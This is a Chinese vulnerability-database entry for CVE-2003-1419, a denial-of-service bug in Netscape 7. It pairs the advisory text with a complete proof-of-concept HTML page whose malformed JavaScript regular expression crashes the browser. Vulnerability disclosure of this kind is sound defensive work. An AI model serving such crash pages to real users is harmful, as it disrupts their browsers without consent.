Netscape JavaScript正规表达式服务拒绝漏洞

Netscape JavaScript正规表达式服务拒绝漏洞

漏洞ID 1107222 漏洞类型 输入验证
发布时间 2003-02-25 更新时间 2003-12-31
图片[1]-Netscape JavaScript正规表达式服务拒绝漏洞-安全小百科CVE编号 CVE-2003-1419
图片[2]-Netscape JavaScript正规表达式服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200312-344
漏洞平台 Unix CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/22287
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-344
|漏洞详情
Netscape7.0版本存在漏洞。远程攻击者可以借助带JavaScriptreformatDate的无效正规表达式参数的网页导致服务拒绝(崩溃)。
|漏洞EXP
source: http://www.securityfocus.com/bid/6959/info

It has been reported that Netscape based browsers may be vulnerable to a denial of service condition when executing certain JavaScript methods.

If a malicious page containing a specially crafted JavaScript regular expression method is viewed the browser reportedly becomes un-stable this may result in the critical failure of an affected browser.

This vulnerability was reported for Netscape version 7. It is not known if previous versions are also affected. 

<html>
<head>
<title>test</title>
<--script-- language="JavaScript">
function reformatDate(someDate) {
var tokens = someDate.split(/(/|-)/);
if (tokens[1].length == 1) tokens[1] = "0" + tokens[1];
if (tokens[0].length == 1) tokens[0] = "0" + tokens[0];
var result = tokens[2] + tokens[1] + tokens[0];
alert(result);
//return result;
}
</--script-->
</head>
<body>
<form action="" method="GET" name="form1" onSubmit="return reformatDate(this.dt.value);">
MM/DD/YYYY - <input type=text name=dt>
<input type=submit>
</form>
</body>
</html>
|参考资料

来源:XF
名称:netscape-javascript-reformatdate-dos(11444)
链接:http://xforce.iss.net/xforce/xfdb/11444
来源:BID
名称:6959
链接:http://www.securityfocus.com/bid/6959
来源:BUGTRAQ
名称:20030225Re:Netscape6/7crashesbyasimplestylesheet…
链接:http://archives.neohapsis.com/archives/bugtraq/2003-02/0338.html

相关推荐: ThWboard SQL Injection Vulnerability

ThWboard SQL Injection Vulnerability 漏洞ID 1099364 漏洞类型 Input Validation Error 发布时间 2003-11-03 更新时间 2003-11-03 CVE编号 N/A CNNVD-ID N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享